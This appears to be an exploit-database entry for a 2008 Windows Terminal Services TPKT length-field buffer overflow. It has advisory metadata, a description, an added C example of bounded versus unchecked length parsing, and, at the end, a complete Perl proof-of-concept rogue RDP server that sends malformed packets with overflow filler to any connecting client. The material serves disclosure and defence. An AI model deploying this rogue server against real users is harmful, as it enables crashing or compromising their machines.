Vendor: Windows
By: milw0rm.com
CVSS: 6.8 (MEDIUM)
Type: Buffer Overflow
CWE: 120
Product Name: Windows
Affected Version From: Windows 2000
Affected Version To: Windows 2008
Patch Exists: YES
Related CVE: N/A
CPE: o:microsoft:windows
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2008

Microsoft Terminal Server Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Terminal Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the TPKT length field. By sending a specially crafted packet with an overly large length field, an attacker can cause a stack-based buffer overflow. This can be leveraged to execute arbitrary code under the context of the SYSTEM user. The proof of concept below takes the server side of the connection: it listens on TCP/3389 and returns the malformed TPKT packet to any Terminal Services client that connects to it.
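As an added illustration (not the iDefense, Microsoft or milw0rm code, and not part of the original exploit entry), the C program below puts the unchecked length arithmetic behind this class of bug next to a bounded TPKT/X.224 reader. The function names, error codes and the TPDU_MAX buffer bound are assumptions made for the example; the two sample packets are constructed, one reproducing the PoC's first eleven bytes (TPKT length field 1, then an X.224 Connection Confirm) and one carrying the same TPDU with a correct length field.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* TPKT (RFC 1006) header: version 3, reserved, 16-bit big-endian total
 * length that includes the 4-byte header itself. */
#define TPKT_HDR_LEN  4
#define TPKT_VERSION  3
#define X224_CC_CODE  0xD0      /* Connection Confirm TPDU, code in the high nibble */
#define TPDU_MAX      4096      /* assumed receive-buffer bound, not a protocol value */

enum tpkt_err {
    TPKT_OK          =  0,
    TPKT_E_SHORT_HDR = -1,      /* fewer than 4 bytes on the wire */
    TPKT_E_VERSION   = -2,      /* version byte is not 3 */
    TPKT_E_LEN_TINY  = -3,      /* length field smaller than the header (the PoC case) */
    TPKT_E_TRUNCATED = -4,      /* length field claims more than was received */
    TPKT_E_TOO_BIG   = -5,      /* TPDU would not fit the destination buffer */
    TPKT_E_BAD_CC    = -6       /* TPDU is not a well-formed Connection Confirm */
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* The naive arithmetic: payload size = length field minus header size.
 * With the PoC's length field of 1 the subtraction wraps to a huge size_t;
 * a memcpy driven by it runs straight off the end of a fixed stack buffer. */
size_t tpkt_payload_len_unchecked(const uint8_t *hdr)
{
    return (size_t)be16(hdr + 2) - TPKT_HDR_LEN;
}

/* Bounded reader: checks the length field against the header size, the bytes
 * actually received and the destination capacity before any copy happens. */
int tpkt_read_tpdu(const uint8_t *wire, size_t wirelen,
                   uint8_t *out, size_t outcap, size_t *outlen)
{
    if (wirelen < TPKT_HDR_LEN)   return TPKT_E_SHORT_HDR;
    if (wire[0] != TPKT_VERSION)  return TPKT_E_VERSION;
    uint16_t len = be16(wire + 2);
    if (len < TPKT_HDR_LEN)       return TPKT_E_LEN_TINY;
    if (len > wirelen)            return TPKT_E_TRUNCATED;
    size_t tpdu_len = (size_t)len - TPKT_HDR_LEN;
    if (tpdu_len > outcap)        return TPKT_E_TOO_BIG;
    memcpy(out, wire + TPKT_HDR_LEN, tpdu_len);
    *outlen = tpdu_len;
    return TPKT_OK;
}

/* X.224 Connection Confirm: LI, code, DST-REF, SRC-REF, class option.
 * Returns the peer's SRC-REF (0..65535) or TPKT_E_BAD_CC. */
long x224_parse_cc(const uint8_t *tpdu, size_t len)
{
    if (len < 7)                            return TPKT_E_BAD_CC;
    uint8_t li = tpdu[0];                   /* length indicator excludes itself */
    if (li < 6 || (size_t)li + 1 > len)     return TPKT_E_BAD_CC;
    if ((tpdu[1] & 0xF0) != X224_CC_CODE)   return TPKT_E_BAD_CC;
    return be16(tpdu + 4);
}

/* Validate a received TPKT against a caller-chosen capacity (capped at TPDU_MAX). */
int tpkt_validate(const uint8_t *wire, size_t wirelen, size_t cap)
{
    uint8_t tpdu[TPDU_MAX];
    size_t n;
    return tpkt_read_tpdu(wire, wirelen, tpdu, cap < TPDU_MAX ? cap : TPDU_MAX, &n);
}

/* Full server-to-client path: TPKT framing first, then the CC TPDU inside it. */
long tpkt_cc_src_ref(const uint8_t *wire, size_t wirelen)
{
    uint8_t tpdu[TPDU_MAX];
    size_t n;
    int rc = tpkt_read_tpdu(wire, wirelen, tpdu, sizeof tpdu, &n);
    return rc != TPKT_OK ? rc : x224_parse_cc(tpdu, n);
}

/* Constructed samples. TPKT_EVIL reproduces the PoC's first eleven bytes:
 * length field 1, then a Connection Confirm. TPKT_GOOD is the same TPDU with
 * the correct length field, 4 + 7 = 11. */
const uint8_t TPKT_EVIL[] = { 0x03,0x00,0x00,0x01, 0x06,0xd0,0x00,0x00,0x12,0x34,0x00 };
const uint8_t TPKT_GOOD[] = { 0x03,0x00,0x00,0x0b, 0x06,0xd0,0x00,0x00,0x12,0x34,0x00 };

int main(void)
{
    printf("unchecked payload length for PoC header: %zu\n",
           tpkt_payload_len_unchecked(TPKT_EVIL));
    printf("PoC packet:  rc=%ld\n", tpkt_cc_src_ref(TPKT_EVIL, sizeof TPKT_EVIL));
    printf("good packet: SRC-REF=0x%04lx\n", tpkt_cc_src_ref(TPKT_GOOD, sizeof TPKT_GOOD));
    return 0;
}
```

The two checks that matter for this bug are the ones a length-driven copy most often skips: the length field must cover the header it belongs to (otherwise the payload size wraps), and it must not exceed either the bytes actually on hand or the capacity of the buffer being written. The reader rejects the PoC packet at the first of those before touching the 200 KB of filler that follows it.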

Mitigation:

Microsoft has released a set of patches for Windows 2000, XP, 2003, Vista, and 2008 to address this vulnerability.

Exploit-DB raw data:

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696
#
# Rogue RDP server: listens on TCP/3389 and answers every Terminal Services
# client that connects with a TPKT packet whose length field (1) is smaller
# than the 4-byte TPKT header, followed by an X.224 Connection Confirm TPDU
# and roughly 200 KB of 0x41 filler.

use warnings;
use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(
    LocalAddr => '0.0.0.0',
    LocalPort => 3389,
    Proto     => 'tcp',
    Listen    => 1,
    Reuse     => 1,
) || die($!);

while (my $c = $sock->accept())
{
        $c->autoflush(1);
        print $c        "\x03"                          .# TPKT version
                        "\x00"                          .# reserved
                        "\x00\x01"                      .# evil length here: 1, smaller than the header itself
                        "\x06\xd0\x00\x00\x12\x34\x00"  .# X.224 CC TPDU: LI=6, code 0xD0, DST-REF 0, SRC-REF 0x1234, class 0
                        "\x41" x 204942;                 # filler that overruns the client's buffer

        sleep 1;
        close $c;       # close the client only; keep the listener open for the next connection
}

# milw0rm.com [2008-05-08]